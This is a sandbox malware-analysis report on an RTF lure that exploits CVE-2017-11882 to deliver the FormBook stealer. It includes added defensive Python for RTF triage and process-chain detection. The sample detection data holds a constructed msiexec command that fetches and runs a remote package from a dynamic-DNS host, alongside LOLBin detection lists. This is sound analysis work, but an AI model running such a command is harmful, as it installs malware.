File name:

PF215 ORDER.doc

Full analysis: https://app.any.run/tasks/246a99a6-ad60-40cb-bc0c-95fe3549864b
Verdict: Malicious activity
Threats:

FormBook is a data stealer sold as malware-as-a-service (MaaS). It differs from much competing malware in its extreme ease of use, which lets even inexperienced threat actors deploy FormBook.

Analysis date: June 26, 2019, 11:53:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
cve-2017-11882
opendir
exe-to-msi
loader
trojan
formbook
stealer
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
Note: despite the .doc file name this is an RTF document. Word selects the parser by content, not by extension, so the rename is no defence and the sample is handled as RTF; the embedded OLE object (ole-embedded tag) lives in the RTF \object group.
MD5:

2FFE1A318736D58FEDF4C4D37D9A11D3

SHA1:

8EAAE0CC3B061A8F19C77FBBE4253020CC54CB6A

SHA256:

36B6A50CEC1BC87D95E4A81EDF1F8CB601A97B1D52D820806589C69676021591

SSDEEP:

192:pxx4JgBwixtJQ5J6FWdkzqMpH/M5y1XL6qB9MK9a6RDjKi/bEPkod8sjG5LX+ppj:So0D9+cP
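The tags ole-embedded and cve-2017-11882 come from the OLE object embedded in the RTF. The following static triage script is an added example and is not ANY.RUN's code or the sample itself: it pulls every \objdata hex blob out of an RTF, parses the OLE 1.0 ObjectHeader that precedes the object bytes (OLEVersion, FormatID, ClassName, TopicName, ItemName, NativeDataSize), and reports whether the class is an Equation Editor ProgID or the Microsoft Equation 3.0 CLSID appears in the blob, plus whether \objupdate is set (the object is refreshed on open without a click). The sample RTF at the bottom is constructed for the example; the report does not reproduce the bytes of PF215 ORDER.doc, and the dummy native data is a placeholder, not an MTEF payload.

```python
import binascii
import re
import struct

# ProgIDs registered to the Equation Editor (EQNEDT32.EXE). An embedded object
# with one of these classes is what drives the CVE-2017-11882 code path.
EQUATION_EDITOR_PROGIDS = {"equation.3", "equation.2"}
# CLSID of Microsoft Equation 3.0, {0002CE02-0000-0000-C000-000000000046},
# as stored on disk (little-endian Data1/Data2/Data3), for OLE2 payloads.
EQUATION3_CLSID_LE = bytes.fromhex("02CE020000000000C000000000000046")

OBJDATA_RE = re.compile(r"\\\*\\objdata\s*([0-9A-Fa-f\s]+)")
OBJCLASS_RE = re.compile(r"\\\*\\objclass\s+([^}\\]+)")


def parse_ole1_header(blob: bytes):
    """Parse the OLE 1.0 ObjectHeader carried by \\objdata (MS-OLEDS 2.2.4):
    OLEVersion, FormatID, three length-prefixed ANSI strings (ClassName,
    TopicName, ItemName), then NativeDataSize and NativeData."""
    if len(blob) < 8:
        return None
    version, format_id = struct.unpack_from("<II", blob, 0)
    offset = 8
    names = []
    for _ in range(3):
        if offset + 4 > len(blob):
            return None
        length = struct.unpack_from("<I", blob, offset)[0]
        offset += 4
        names.append(blob[offset:offset + length].rstrip(b"\x00").decode("latin-1", "replace"))
        offset += length
    native_size, native = None, b""
    if offset + 4 <= len(blob):
        native_size = struct.unpack_from("<I", blob, offset)[0]
        native = blob[offset + 4:offset + 4 + native_size]
    return {
        "ole_version": version,
        "format_id": format_id,          # 2 = EmbeddedObject, 3 = LinkedObject
        "class_name": names[0],
        "topic_name": names[1],
        "item_name": names[2],
        "native_size": native_size,
        "native_data": native,
    }


def triage_rtf(rtf_text: str):
    """Return one finding per \\objdata blob found in the RTF text."""
    findings = []
    declared = [c.strip() for c in OBJCLASS_RE.findall(rtf_text)]
    auto_update = "\\objupdate" in rtf_text   # object refreshed on open: no user click needed
    for index, match in enumerate(OBJDATA_RE.finditer(rtf_text)):
        hex_text = re.sub(r"\s+", "", match.group(1))
        if len(hex_text) % 2:
            hex_text = hex_text[:-1]           # tolerate a truncated trailing nibble
        blob = binascii.unhexlify(hex_text)
        header = parse_ole1_header(blob) or {}
        class_name = header.get("class_name", "")
        findings.append({
            "index": index,
            "declared_objclass": declared[index] if index < len(declared) else None,
            "class_name": class_name,
            "format_id": header.get("format_id"),
            "native_size": header.get("native_size"),
            "equation_editor": class_name.lower() in EQUATION_EDITOR_PROGIDS
                               or EQUATION3_CLSID_LE in blob,
            "objupdate": auto_update,
        })
    return findings


def is_equation_editor_lure(rtf_text: str) -> bool:
    return any(f["equation_editor"] for f in triage_rtf(rtf_text))


# Constructed sample input (not the bytes of PF215 ORDER.doc): a minimal RTF
# with an auto-updating embedded Equation.3 object and dummy native data.
def _ole1_embedded(class_name: str, native: bytes) -> bytes:
    name = class_name.encode("ascii") + b"\x00"
    return (struct.pack("<II", 0x00000501, 2)
            + struct.pack("<I", len(name)) + name
            + struct.pack("<I", 0) + struct.pack("<I", 0)
            + struct.pack("<I", len(native)) + native)


def _rtf_with_object(class_name: str, native: bytes, auto_update: bool = True) -> str:
    upd = "\\objupdate" if auto_update else ""
    data = binascii.hexlify(_ole1_embedded(class_name, native)).decode()
    return ("{\\rtf1\\ansi{\\object\\objemb" + upd
            + "{\\*\\objclass " + class_name + "}"
            + "{\\*\\objdata " + data + "}}}")


SAMPLE_LURE = _rtf_with_object("Equation.3", b"\x03\x01\x01\x03" + b"A" * 48)
SAMPLE_BENIGN = _rtf_with_object("Word.Document.8", b"\xd0\xcf\x11\xe0" * 4, auto_update=False)

if __name__ == "__main__":
    for finding in triage_rtf(SAMPLE_LURE):
        print(finding)
```

The class-name check is case-insensitive because lure builders vary the case of the ProgID; other RTF obfuscations (control words split across groups, objdata spread over nested groups) defeat this simple regex, so treat a negative as "not found" rather than "clean".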

ANY.RUN is an interactive service that gives the analyst full access to the guest system. Information in this report may have been influenced by analyst actions and is provided as is. ANY.RUN does not guarantee that the content is malicious or safe.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 3464)
      • cmd.exe (PID: 3344)
    • Application was dropped or rewritten from another process

      • obj2Bilmaven8.exe (PID: 2332)
      • obj2Bilmaven8.exe (PID: 3440)
      • obj2Bilmaven8.exe (PID: 2356)
      • obj2Bilmaven8.exe (PID: 456)
      • obj2Bilmaven8.exe (PID: 3912)
      • obj2Bilmaven8.exe (PID: 3604)
      • EQNEDT32.EXE (PID: 3320)
      • EQNEDT32.EXE (PID: 2804)
      • EQNEDT32.EXE (PID: 2792)
      • msohtmed.exe (PID: 2288)
      • EQNEDT32.EXE (PID: 4000)
      • Cookiesjfitqtfp.exe (PID: 1508)
      • obj2Bilmaven8.exe (PID: 2340)
      • obj2Bilmaven8.exe (PID: 2812)
      • Cookiesjfitqtfp.exe (PID: 988)
      • obj2Bilmaven8.exe (PID: 3180)
    • Changes the autorun value in the registry

      • obj2Bilmaven8.exe (PID: 2332)
      • obj2Bilmaven8.exe (PID: 456)
      • taskhost.exe (PID: 3064)
      • obj2Bilmaven8.exe (PID: 3180)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3552)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2792)
      • EQNEDT32.EXE (PID: 2804)
    • Loads dropped or rewritten executable

      • Setup.exe (PID: 2604)
      • WerFault.exe (PID: 3188)
      • WerFault.exe (PID: 3584)
      • EQNEDT32.EXE (PID: 3320)
      • EQNEDT32.EXE (PID: 2804)
      • EQNEDT32.EXE (PID: 2792)
      • WINWORD.EXE (PID: 2936)
      • explorer.exe (PID: 252)
      • svchost.exe (PID: 848)
      • EQNEDT32.EXE (PID: 4000)
      • opera.exe (PID: 2968)
    • Connects to CnC server

      • explorer.exe (PID: 252)
    • FORMBOOK was detected

      • explorer.exe (PID: 252)
    • Formbook was detected

      • taskhost.exe (PID: 3064)
      • Firefox.exe (PID: 3480)
    • Actions look like stealing of personal data

      • taskhost.exe (PID: 3064)
    • Stealing of credential data

      • taskhost.exe (PID: 3064)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2804)
      • taskhost.exe (PID: 3064)
      • EQNEDT32.EXE (PID: 2792)
    • Executed via COM

      • EQNEDT32.EXE (PID: 2804)
      • EQNEDT32.EXE (PID: 2792)
      • Setup.exe (PID: 2604)
      • EQNEDT32.EXE (PID: 3320)
      • DllHost.exe (PID: 2840)
      • EQNEDT32.EXE (PID: 4000)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3552)
    • Application launched itself

      • obj2Bilmaven8.exe (PID: 2332)
      • obj2Bilmaven8.exe (PID: 3440)
      • obj2Bilmaven8.exe (PID: 456)
      • obj2Bilmaven8.exe (PID: 3912)
      • Cookiesjfitqtfp.exe (PID: 1508)
      • obj2Bilmaven8.exe (PID: 3180)
      • obj2Bilmaven8.exe (PID: 2340)
    • Executable content was dropped or overwritten

      • MSI13D3.tmp (PID: 3828)
      • MSI9452.tmp (PID: 4056)
      • Setup.exe (PID: 2604)
      • MsiExec.exe (PID: 2824)
      • MsiExec.exe (PID: 3304)
      • MsiExec.exe (PID: 3256)
      • MsiExec.exe (PID: 3472)
      • MsiExec.exe (PID: 2540)
      • MsiExec.exe (PID: 3932)
      • MsiExec.exe (PID: 1816)
      • MsiExec.exe (PID: 3024)
      • MsiExec.exe (PID: 720)
      • msiexec.exe (PID: 3552)
      • explorer.exe (PID: 252)
      • DllHost.exe (PID: 2840)
      • MsiExec.exe (PID: 2260)
    • Searches for installed software

      • Setup.exe (PID: 2604)
    • Creates files in the Windows directory

      • msiexec.exe (PID: 3552)
    • Creates files in the user directory

      • taskhost.exe (PID: 3064)
    • Loads DLL from Mozilla Firefox

      • taskhost.exe (PID: 3064)
    • Disables SEHOP

      • msiexec.exe (PID: 3552)
    • Removes files from Windows directory

      • msiexec.exe (PID: 3552)
    • Creates COM task schedule object

      • msohtmed.exe (PID: 2288)
      • msiexec.exe (PID: 3552)
    • Starts Microsoft Office Application

      • msiexec.exe (PID: 3552)
    • Creates files in the program directory

      • DllHost.exe (PID: 2840)
    • Modifies the open verb of a shell class

      • msiexec.exe (PID: 3552)
    • Starts itself from another location

      • Cookiesjfitqtfp.exe (PID: 988)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2936)
      • Setup.exe (PID: 2604)
      • MsiExec.exe (PID: 720)
      • msohtmed.exe (PID: 2288)
    • Starts Microsoft Office Application

      • explorer.exe (PID: 252)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2936)
      • Firefox.exe (PID: 3480)
      • opera.exe (PID: 2968)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3552)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3552)
      • MSI13D3.tmp (PID: 2856)
      • MSI9452.tmp (PID: 3548)
    • Application was dropped or rewritten from another process

      • MSI13D3.tmp (PID: 2856)
      • MSI13D3.tmp (PID: 3828)
      • MSI9452.tmp (PID: 3548)
      • MSI9452.tmp (PID: 4056)
      • MSIEAAA.tmp (PID: 868)
    • Application launched itself

      • MSI13D3.tmp (PID: 2856)
      • MSI9452.tmp (PID: 3548)
      • msiexec.exe (PID: 3552)
    • Manual execution by user (this signature fires because explorer.exe is the parent; here explorer.exe is the FormBook-injected process flagged above, and taskhost.exe is where the stealer signatures fire, so these launches should not be read as analyst activity)

      • taskhost.exe (PID: 3064)
      • wuapp.exe (PID: 3208)
    • Application was crashed

      • EQNEDT32.EXE (PID: 2792)
      • EQNEDT32.EXE (PID: 2804)
    • Loads dropped or rewritten executable

      • MsiExec.exe (PID: 2824)
      • msiexec.exe (PID: 3552)
      • MsiExec.exe (PID: 2456)
      • MsiExec.exe (PID: 3304)
      • MsiExec.exe (PID: 3500)
      • MsiExec.exe (PID: 2088)
      • MsiExec.exe (PID: 3256)
      • MsiExec.exe (PID: 3472)
      • MsiExec.exe (PID: 3348)
      • MsiExec.exe (PID: 3524)
      • MsiExec.exe (PID: 2328)
      • MsiExec.exe (PID: 3444)
      • MsiExec.exe (PID: 3816)
      • MsiExec.exe (PID: 2148)
      • MsiExec.exe (PID: 2540)
      • MsiExec.exe (PID: 2480)
      • MsiExec.exe (PID: 3932)
      • MsiExec.exe (PID: 1688)
      • MsiExec.exe (PID: 2516)
      • MsiExec.exe (PID: 1816)
      • MsiExec.exe (PID: 3156)
      • MsiExec.exe (PID: 3024)
      • MsiExec.exe (PID: 3960)
      • MsiExec.exe (PID: 720)
      • MsiExec.exe (PID: 2416)
      • MSIEAAA.tmp (PID: 868)
      • MsiExec.exe (PID: 2260)
      • MsiExec.exe (PID: 1668)
    • Creates files in the program directory

      • MsiExec.exe (PID: 2456)
      • MsiExec.exe (PID: 3500)
      • msiexec.exe (PID: 3552)
      • MsiExec.exe (PID: 3524)
      • MsiExec.exe (PID: 3348)
      • MsiExec.exe (PID: 2480)
      • MsiExec.exe (PID: 2516)
      • MsiExec.exe (PID: 3156)
      • MsiExec.exe (PID: 3960)
      • MsiExec.exe (PID: 2416)
      • MsiExec.exe (PID: 1668)
    • Dropped object may contain Bitcoin addresses

      • msiexec.exe (PID: 3552)
    • Creates a software uninstall entry

      • msiexec.exe (PID: 3552)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
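The malicious signatures above describe one process chain: WINWORD.EXE renders the RTF, EQNEDT32.EXE is launched via COM and exploited, it starts cmd.exe, cmd.exe runs msiexec.exe against a remote package on a dynamic-DNS host, the MSI runs from a C:\Windows\Installer\*.tmp file, and the dropped obj2Bilmaven8.exe relaunches itself. The detection logic below is an added example, not ANY.RUN's signature code: it evaluates process-creation events (image, command line, parent image, as Sysmon event 1 or an EDR would record them) against rules for each link of that chain. The sample events are constructed from the PIDs and paths in this report; the command lines of cmd.exe and msiexec.exe, and the EQNEDT32.EXE `-Embedding` launch, are assumptions because the report does not show them.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    image: str          # file name only, as basename() of the image path
    cmdline: str
    parent_image: str


OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "msiexec.exe", "mshta.exe",
                   "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
                   "certutil.exe"}
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")  # partial list
URL_RE = re.compile(r"https?://([^\s/\"']+)")


def match_rules(e: ProcEvent) -> List[str]:
    img, parent, cl = e.image.lower(), e.parent_image.lower(), e.cmdline.lower()
    hits = []
    # 1. EQNEDT32.EXE is a COM server that renders equations; it has no reason
    #    to create processes. Any child is CVE-2017-11882 style behaviour.
    if parent == "eqnedt32.exe":
        hits.append("equation_editor_spawned_child")
    # 2. Office (or one of its OLE servers) launching a script/installer host.
    if parent in OFFICE_IMAGES and img in LOLBIN_CHILDREN:
        hits.append("office_to_lolbin")
    # 3. msiexec handed a URL fetches and runs a remote package (the exe-to-msi
    #    loader seen in this report); a dynamic-DNS host makes it worse.
    url = URL_RE.search(cl)
    if img == "msiexec.exe" and url:
        hits.append("msiexec_remote_package")
        if url.group(1).endswith(DYNAMIC_DNS_SUFFIXES):
            hits.append("dynamic_dns_download_host")
    # 4. An executable running under the Installer cache with a .tmp name
    #    (MSI13D3.tmp / MSI9452.tmp here).
    if img.endswith(".tmp") and "\\windows\\installer\\" in cl:
        hits.append("installer_tmp_executable")
    # 5. A process relaunching its own image (unpacking or injection stage).
    if img == parent and img not in {"explorer.exe", "svchost.exe", "cmd.exe", "msiexec.exe"}:
        hits.append("self_relaunch")
    # 6. Anything started by a .tmp executable.
    if parent.endswith(".tmp"):
        hits.append("spawned_by_tmp_executable")
    return hits


def evaluate(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map each PID that matched at least one rule to its rule names."""
    result = {}
    for e in events:
        hits = match_rules(e)
        if hits:
            result[e.pid] = hits
    return result


# Constructed sample events. PIDs, image names and drop paths are from this
# report; the command lines marked ASSUMED are not shown in the report.
SAMPLE_EVENTS = [
    ProcEvent(2936, "WINWORD.EXE",
              '"C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE" /n "C:\\Users\\admin\\Desktop\\PF215 ORDER.doc"',  # ASSUMED
              "explorer.exe"),
    ProcEvent(2804, "EQNEDT32.EXE",
              '"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" -Embedding',  # ASSUMED
              "svchost.exe"),
    ProcEvent(3344, "cmd.exe",
              "cmd /c msiexec /i http://joeing.duckdns.org/joe/onye.msi /q",  # ASSUMED
              "EQNEDT32.EXE"),
    ProcEvent(3552, "msiexec.exe",
              "msiexec /i http://joeing.duckdns.org/joe/onye.msi /q",  # ASSUMED
              "cmd.exe"),
    ProcEvent(3548, "MSI9452.tmp", '"C:\\Windows\\Installer\\MSI9452.tmp"', "msiexec.exe"),
    ProcEvent(456, "obj2Bilmaven8.exe",
              '"C:\\Users\\admin\\AppData\\Local\\Temp\\obj2Bilmaven8.exe"', "MSI9452.tmp"),
    ProcEvent(2340, "obj2Bilmaven8.exe",
              '"C:\\Users\\admin\\AppData\\Local\\Temp\\obj2Bilmaven8.exe"', "obj2Bilmaven8.exe"),
    ProcEvent(2968, "opera.exe", '"C:\\Program Files\\Opera\\opera.exe"', "explorer.exe"),  # benign control
]

if __name__ == "__main__":
    for pid, hits in evaluate(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Rule 1 alone would have caught this sample: EQNEDT32.EXE never has a legitimate child, so it can run at alert severity with no tuning. Rules 3 to 6 are noisier on hosts where software installs are routine and belong in a correlation over the whole chain rather than as stand-alone alerts.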
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
All screenshots are available in the full report
Total processes
106
Monitored processes
67
Malicious processes
15
Suspicious processes
6

Behavior graph

Interactive in the full report (click a process to see its details). Processes in the graph, in display order: winword.exe, eqnedt32.exe, cmd.exe, msiexec.exe, msi13d3.tmp, obj2bilmaven8.exe, taskhost.exe (#FORMBOOK), msi9452.tmp, setup.exe, wuapp.exe, werfault.exe, explorer.exe (#FORMBOOK), firefox.exe (#FORMBOOK), msohtmed.exe, svchost.exe, msieaaa.tmp, addinutil.exe, opera.exe, cookiesjfitqtfp.exe, mstsc.exe, plus a "Copy/Move/Rename/Delete/Link Object" COM node. Edges are labelled "start" or "drop and start"; "#FORMBOOK" marks the processes in which the FormBook signature fired, and "no specs" marks processes with no notable behaviour recorded.

Process information

Fields: PID, CMD, Path, Parent process (indicators per process are listed in the signature section above)

PID: 252
CMD: C:\Windows\Explorer.EXE
Path: C:\Windows\explorer.exe
Parent process: ctfmon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\winanr.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
PID: 456
CMD: "C:\Users\admin\AppData\Local\Temp\obj2Bilmaven8.exe"
Path: C:\Users\admin\AppData\Local\Temp\obj2Bilmaven8.exe
Parent process: MSI9452.tmp
User:
admin
Company:
PIOnEEr
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.00
Modules
Images
c:\users\admin\appdata\local\temp\obj2bilmaven8.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
PID: 720
CMD: C:\Windows\system32\MsiExec.exe -Embedding A4289970CB0CC3407FC746177CC8D6F2
Path: C:\Windows\system32\MsiExec.exe
Parent process: msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 848
CMD: C:\Windows\system32\svchost.exe -k netsvcs
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windanr.exe
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
PID: 868
CMD: "C:\Windows\Installer\MSIEAAA.tmp" ms-help://Hx
Path: C:\Windows\Installer\MSIEAAA.tmp
Parent process: msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\windows\installer\msieaaa.tmp
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 988
CMD: "C:\Program Files\G8pk\Cookiesjfitqtfp.exe"
Path: C:\Program Files\G8pk\Cookiesjfitqtfp.exe
Parent process: Cookiesjfitqtfp.exe
User:
admin
Company:
PIOnEEr
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.00
Modules
Images
c:\program files\g8pk\cookiesjfitqtfp.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
PID: 1340
CMD: "C:\Windows\Microsoft.NET\Framework\v3.5\addinutil.exe" -PipelineRoot:"C:\Program Files\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\." -Rebuild
Path: C:\Windows\Microsoft.NET\Framework\v3.5\addinutil.exe
Parent process: MsiExec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
AddInUtil.exe
Exit code:
0
Version:
3.5.30729.5420 built by: Win7SP1
Modules
Images
c:\windows\microsoft.net\framework\v3.5\addinutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 1508
CMD: "C:\Program Files\G8pk\Cookiesjfitqtfp.exe"
Path: C:\Program Files\G8pk\Cookiesjfitqtfp.exe
Parent process: explorer.exe
User:
admin
Company:
PIOnEEr
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.00
Modules
Images
c:\program files\g8pk\cookiesjfitqtfp.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
PID: 1668
CMD: C:\Windows\system32\MsiExec.exe -Embedding 238F59E626D63714DB2C260DCEF78DE6 M Global\MSI0000
Path: C:\Windows\system32\MsiExec.exe
Parent process: msiexec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1688
CMD: C:\Windows\system32\MsiExec.exe -Embedding 00AC4291C6AA2E02BEBCB6FD12234BBB
Path: C:\Windows\system32\MsiExec.exe
Parent process: msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
24 187
Read events
12 672
Write events
10 693
Delete events
822

Modification events

PID: 2936 | Process: WINWORD.EXE | Operation: write
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Name: *d
Value: 2A642000780B0000010000000000000000000000

PID: 2936 | Process: WINWORD.EXE | Operation: write
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Name: 1033
Value: Off

PID: 2936 | Process: WINWORD.EXE | Operation: write
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Name: 1033
Value: On

PID: 2936 | Process: WINWORD.EXE | Operation: write
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Name: WORDFiles
Value: 1322909726

PID: 2936 | Process: WINWORD.EXE | Operation: write
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Name: ProductFiles
Value: 1322909848

PID: 2936 | Process: WINWORD.EXE | Operation: write
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Name: ProductFiles
Value: 1322909849

PID: 2936 | Process: WINWORD.EXE | Operation: write
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Name: MTTT
Value: 780B000040B23FD3152CD50100000000

PID: 2936 | Process: WINWORD.EXE | Operation: write
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Name: $e
Value: 24652000780B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

PID: 2936 | Process: WINWORD.EXE | Operation: delete value
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Name: $e
Value: 24652000780B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

PID: 2936 | Process: WINWORD.EXE | Operation: write
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Name: UNCAsIntranet
Value: 0

The ten events shown here are all Word's own resiliency and housekeeping writes (the $e value is the UTF-16 path of Normal.dotm, written and deleted again). The autorun write flagged under "Changes the autorun value in the registry" (obj2Bilmaven8.exe and taskhost.exe) is not among them and has to be taken from the full report.
Executable files
397
Suspicious files
144
Text files
94
Unknown types
145

Dropped files

PID | Process | Filename | Type
2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE88A.tmp.cvr | -
3188 | WerFault.exe | C:\Users\admin\AppData\Local\Temp\WERF136.tmp.hdmp | -
3188 | WerFault.exe | C:\Users\admin\AppData\Local\Temp\WERF1D4.tmp.mdmp | -
3188 | WerFault.exe | C:\Users\admin\AppData\Local\Temp\WERF0C7.tmp.appcompat.txt | xml
    MD5: A7C42BA6416A96B9C45530F199833D9E
    SHA256: 48ECE97C88734E9D7BF84CDBDEE5A8C2EF98AA2A77DEDC6D4B057227E3A13DC6
3188 | WerFault.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\WER\ReportQueue\AppCrash_EQNEDT32.EXE_e4aa521f92615d8f32933274bec345ab359a4aca_cab_0c60f24e\WERF136.tmp.hdmp | dmp
    MD5: 12C1D0E49604611BF75B79FE333FF133
    SHA256: FC0E5247DEC68E4FC3262169C39301C79224F930D93BF2A13B345911D9B40279
3552 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF5A1114757101AFFA.TMP | -
848 | svchost.exe | C:\Windows\appcompat\programs\RecentFileCache.bcf | text
    MD5: 71CA7046B0B8C29B86E377E31888B3D7
    SHA256: 1EF7983D907EA8D5C152B0A6352827CA3F4133C26E42A77E66AF092D86073AD0
3552 | msiexec.exe | C:\Windows\Installer\MSI1045.tmp | executable
    MD5: ED24583EBBD6CF680E5A425C220412F2
    SHA256: 5A9D3EE3E3703ECBBDA8B47A17710DB9E3B1F4233971C4C4FF2D4BDC872F4553
